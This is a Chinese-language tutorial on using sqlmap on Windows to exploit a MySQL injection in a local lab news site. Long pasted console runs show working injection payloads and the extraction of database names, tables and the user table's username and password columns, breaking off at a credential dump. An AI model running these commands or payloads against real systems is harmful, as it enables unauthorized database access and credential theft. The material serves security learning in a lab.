漏洞原理MySql注入 Windows中Sqlmap 工具的使用

漏洞原理MySql注入 

SQLmap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。以下是SQLmap工具的使用总结:

  1. 安装和配置:首先需要下载并安装SQLmap工具。安装完成后,可以通过命令行界面或图形用户界面来使用工具。配置文件可以通过编辑sqlmap.conf文件来对工具进行配置。

  2. 目标选择:在使用SQLmap之前,需要选择目标进行测试。可以使用命令行参数或图形用户界面来指定目标URL或IP地址。

  3. 测试目标:使用SQLmap对目标进行测试,工具会检测是否存在SQL注入漏洞。可以通过命令行参数或图形用户界面来指定测试选项,如测试类型、POST数据、Cookie等。

  4. 漏洞利用:如果SQLmap检测到目标存在SQL注入漏洞,可以利用该漏洞执行各种操作,如获取数据库信息、执行系统命令、上传文件等。可以通过命令行参数或图形用户界面来指定利用选项。

  5. 结果分析:SQLmap会生成详细的测试报告,显示漏洞的利用结果和可能的漏洞影响范围。可以通过命令行参数或图形用户界面来指定输出格式和详细程度。

  6. 高级功能:SQLmap还提供了一些高级功能,如指定代理服务器、设置HTTP头、使用多线程等。这些功能可以通过命令行参数或图形用户界面进行配置。

SQLmap是一款强大的SQL注入工具,但使用时需要注意法律和道德的问题。在进行测试之前,应该获得合法的授权,并遵守相关法规和道德准则。

安装SQLmap

【渗透工具】sqlmap下载安装详细教程Windows/Linux(图文)-CSDN博客

SQLmap是一种用于自动化检测和利用SQL注入漏洞的开源工具。它使用SQL注入技术来探测和利用对数据库的未经授权访问。下面是SQLmap的一些基本语法:

  • 指定目标URL sqlmap -u <目标URL>

  • 指定目标URL列表文件 sqlmap -m <目标URL列表文件>

  • 指定HTTP请求文件 sqlmap -r <HTTP请求文件>

  • 指定Cookie sqlmap -u <目标URL> --cookie="<Cookie>"

  • 指定User-Agent sqlmap -u <目标URL> --user-agent="<User-Agent>"

  • 指定数据库管理系统(DBMS) sqlmap -u <目标URL> --dbms="<DBMS>"

  • 指定注入点 sqlmap -u <目标URL> --dbms="<DBMS>" --level=<注入点等级>

  • 搜索可用的数据库 sqlmap -u <目标URL> --dbms="<DBMS>" --dbs

  • 搜索数据库表 sqlmap -u <目标URL> --dbms="<DBMS>" --dbs --tables

  • 搜索表中的列 sqlmap -u <目标URL> --dbms="<DBMS>" --dbs --tables --columns

  • 检索表中的数据 sqlmap -u <目标URL> --dbms="<DBMS>" --dbs --tables --columns --dump

这些是SQLmap的一些基本语法,用于检测和利用SQL注入漏洞。请注意,使用SQLmap进行攻击是非法的,并且只能在合法授权的范围内使用。


1. 获取服务器信息,包括操作系统、数据库、web容器、后端语言 # python sqlmap.py -u url


D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46_____H_____ ___[,]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:30:02 /2024-01-28/[17:30:02] [INFO] resuming back-end DBMS 'mysql'
[17:30:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:30:04] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:30:05] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:30:05] [WARNING] your sqlmap version is outdated[*] ending @ 17:30:05 /2024-01-28/

2. 获取数据库名称列表 # python sqlmap.py -u url -dbs

3. 获取当前数据库名称 # python sqlmap.py -u url --current-db


D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  --current-db_____H_____ ___[.]_____ ___ ___  {1.5.3.16#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:31:45 /2024-01-28/[17:31:45] [INFO] resuming back-end DBMS 'mysql'
[17:31:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:31:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:31:47] [INFO] fetching current database
[17:31:52] [INFO] resumed: 'news'
current database: 'news'
[17:31:52] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:31:52] [WARNING] your sqlmap version is outdated[*] ending @ 17:31:52 /2024-01-28/

4. 获取当前数据库中所有表的名称 # python sqlmap.py -u url -D 数据库名 --tables

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news --tables_____H_____ ___[)]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:28:40 /2024-01-28/[17:28:40] [INFO] resuming back-end DBMS 'mysql'
[17:28:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:28:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:28:42] [INFO] fetching tables for database: 'news'
[17:28:48] [WARNING] the SQL query provided does not return any output
[17:28:48] [INFO] resumed: 'news_article'
[17:28:48] [INFO] resumed: 'news_category'
[17:28:48] [INFO] resumed: 'news_file'
[17:28:48] [INFO] resumed: 'news_friendlink'
[17:28:48] [INFO] resumed: 'news_message'
[17:28:48] [INFO] resumed: 'news_notice'
[17:28:48] [INFO] resumed: 'news_page'
[17:28:48] [INFO] resumed: 'news_users'
Database: news
[8 tables]
+-----------------+
| news_article    |
| news_category   |
| news_file       |
| news_friendlink |
| news_message    |
| news_notice     |
| news_page       |
| news_users      |
+-----------------+[17:28:48] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:28:48] [WARNING] your sqlmap version is outdated[*] ending @ 17:28:48 /2024-01-28/

5. 获取当前数据库指定的表的字段名 # python sqlmap.py -u url -D 数据库名 -T 表名 --columns

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T news_users --columns_____H_____ ___["]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:27:52 /2024-01-28/[17:27:52] [INFO] resuming back-end DBMS 'mysql'
[17:27:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:27:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:27:55] [INFO] fetching columns for table 'news_users' in database 'news'
[17:28:01] [WARNING] the SQL query provided does not return any output
[17:28:01] [INFO] resumed: 'userid'
[17:28:01] [INFO] resumed: 'int(11)'
[17:28:01] [INFO] resumed: 'username'
[17:28:01] [INFO] resumed: 'varchar(20)'
[17:28:01] [INFO] resumed: 'password'
[17:28:01] [INFO] resumed: 'varchar(32)'
Database: news
Table: news_users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
| userid   | int(11)     |
| username | varchar(20) |
+----------+-------------+[17:28:01] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:28:01] [WARNING] your sqlmap version is outdated[*] ending @ 17:28:01 /2024-01-28/

6. 获取指定库指定表指定字段的值 # python sqlmap.py -u url -D 数据库名 -T 表名 -C 字段名1,字段名2... --dump

Microsoft Windows [版本 10.0.22621.3007]
(c) Microsoft Corporation。保留所有权利。D:\sqlmap>dir驱动器 D 中的卷没有标签。卷的序列号是 C25F-A169D:\sqlmap 的目录2023/11/17  15:37    <DIR>          .
2021/03/18  18:40               275 .gitattributes
2021/03/18  18:40    <DIR>          .github
2021/03/18  18:40                77 .gitignore
2021/03/18  18:40            16,703 .pylintrc
2021/03/18  18:40               402 .travis.yml
2021/03/18  18:40             2,092 COMMITMENT
2021/03/18  18:40    <DIR>          data
2021/03/18  18:40    <DIR>          doc
2021/03/18  18:40    <DIR>          extra
2021/03/18  18:40    <DIR>          lib
2021/03/18  18:40            18,886 LICENSE
2023/11/17  15:28                25 payload.txt
2021/03/18  18:40    <DIR>          plugins
2021/03/18  18:40             5,019 README.md
2021/03/18  18:40            21,731 sqlmap.conf
2021/03/18  18:40            21,928 sqlmap.py
2021/03/18  18:40             2,783 sqlmapapi.py
2021/03/18  18:40    <DIR>          tamper
2021/03/18  18:40    <DIR>          thirdparty11 个文件         89,921 字节9 个目录 247,544,782,848 可用字节D:\sqlmap>sqlmap.py_____H_____ ___[)]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.orgUsage: sqlmap.py [options]sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced helpPress Enter to continue...
[17:13:44] [WARNING] your sqlmap version is outdatedD:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php_____H_____ ___["]_____ ___ ___  {1.5.3.16#dev}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:15:02 /2024-01-28/[17:15:05] [INFO] resuming back-end DBMS 'mysql'
[17:15:05] [INFO] testing connection to the target URL
[17:15:07] [INFO] testing if the target URL content is stable
[17:15:09] [INFO] target URL content is stable
[17:15:09] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--forms --crawl=2'
[17:15:09] [WARNING] your sqlmap version is outdated[*] ending @ 17:15:09 /2024-01-28/D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46_____H_____ ___[,]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:16:35 /2024-01-28/[17:16:35] [INFO] resuming back-end DBMS 'mysql'
[17:16:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:16:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:16:38] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:16:38] [WARNING] your sqlmap version is outdated[*] ending @ 17:16:38 /2024-01-28/D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  -dbs_____H_____ ___[)]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:17:13 /2024-01-28/[17:17:13] [INFO] resuming back-end DBMS 'mysql'
[17:17:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:17:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:17:15] [INFO] fetching database names
[17:17:22] [WARNING] the SQL query provided does not return any output
[17:17:22] [INFO] resumed: 'information_schema'
[17:17:22] [INFO] resumed: 'challenges'
[17:17:22] [INFO] resumed: 'mydb'
[17:17:22] [INFO] resumed: 'mysee'
[17:17:22] [INFO] resumed: 'mysql'
[17:17:22] [INFO] resumed: 'news'
[17:17:22] [INFO] resumed: 'performance_schema'
[17:17:22] [INFO] resumed: 'pikachu'
[17:17:22] [INFO] resumed: 'pkxss'
[17:17:22] [INFO] resumed: 'security'
[17:17:22] [INFO] resumed: 'test'
available databases [11]:
[*] challenges
[*] information_schema
[*] mydb
[*] mysee
[*] mysql
[*] news
[*] performance_schema
[*] pikachu
[*] pkxss
[*] security
[*] test[17:17:22] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:17:22] [WARNING] your sqlmap version is outdated[*] ending @ 17:17:22 /2024-01-28/D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  --current -db_____H_____ ___[,]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.orgUsage: sqlmap.py [options]sqlmap.py: error: ambiguous option: --current (--current-db, --current-user?)Press Enter to continue...
[17:17:50] [WARNING] your sqlmap version is outdatedD:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  --current-db_____H_____ ___[(]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:18:06 /2024-01-28/[17:18:07] [INFO] resuming back-end DBMS 'mysql'
[17:18:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:18:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:18:09] [INFO] fetching current database
[17:18:13] [INFO] resumed: 'news'
current database: 'news'
[17:18:13] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:18:13] [WARNING] your sqlmap version is outdated[*] ending @ 17:18:13 /2024-01-28/D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news --tables_____H_____ ___[']_____ ___ ___  {1.5.3.16#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:19:01 /2024-01-28/[17:19:01] [INFO] resuming back-end DBMS 'mysql'
[17:19:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:19:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:19:03] [INFO] fetching tables for database: 'news'
[17:19:09] [WARNING] the SQL query provided does not return any output
[17:19:09] [INFO] resumed: 'news_article'
[17:19:09] [INFO] resumed: 'news_category'
[17:19:09] [INFO] resumed: 'news_file'
[17:19:09] [INFO] resumed: 'news_friendlink'
[17:19:09] [INFO] resumed: 'news_message'
[17:19:09] [INFO] resumed: 'news_notice'
[17:19:09] [INFO] resumed: 'news_page'
[17:19:09] [INFO] resumed: 'news_users'
Database: news
[8 tables]
+-----------------+
| news_article    |
| news_category   |
| news_file       |
| news_friendlink |
| news_message    |
| news_notice     |
| news_page       |
| news_users      |
+-----------------+[17:19:09] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:19:09] [WARNING] your sqlmap version is outdated[*] ending @ 17:19:09 /2024-01-28/D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T -columns_____H_____ ___[']_____ ___ ___  {1.5.3.16#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:19:57 /2024-01-28/[17:19:58] [INFO] resuming back-end DBMS 'mysql'
[17:19:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:20:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:20:00] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:20:00] [WARNING] your sqlmap version is outdated[*] ending @ 17:20:00 /2024-01-28/D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T news_users --columns_____H_____ ___[.]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:20:28 /2024-01-28/[17:20:28] [INFO] resuming back-end DBMS 'mysql'
[17:20:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:20:30] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:20:30] [INFO] fetching columns for table 'news_users' in database 'news'
[17:20:37] [WARNING] the SQL query provided does not return any output
[17:20:37] [INFO] resumed: 'userid'
[17:20:37] [INFO] resumed: 'int(11)'
[17:20:37] [INFO] resumed: 'username'
[17:20:37] [INFO] resumed: 'varchar(20)'
[17:20:37] [INFO] resumed: 'password'
[17:20:37] [INFO] resumed: 'varchar(32)'
Database: news
Table: news_users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
| userid   | int(11)     |
| username | varchar(20) |
+----------+-------------+[17:20:37] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:20:37] [WARNING] your sqlmap version is outdated[*] ending @ 17:20:37 /2024-01-28/D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T news_users -C username,password --dump_____H_____ ___[.]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [(]     | .'| . |
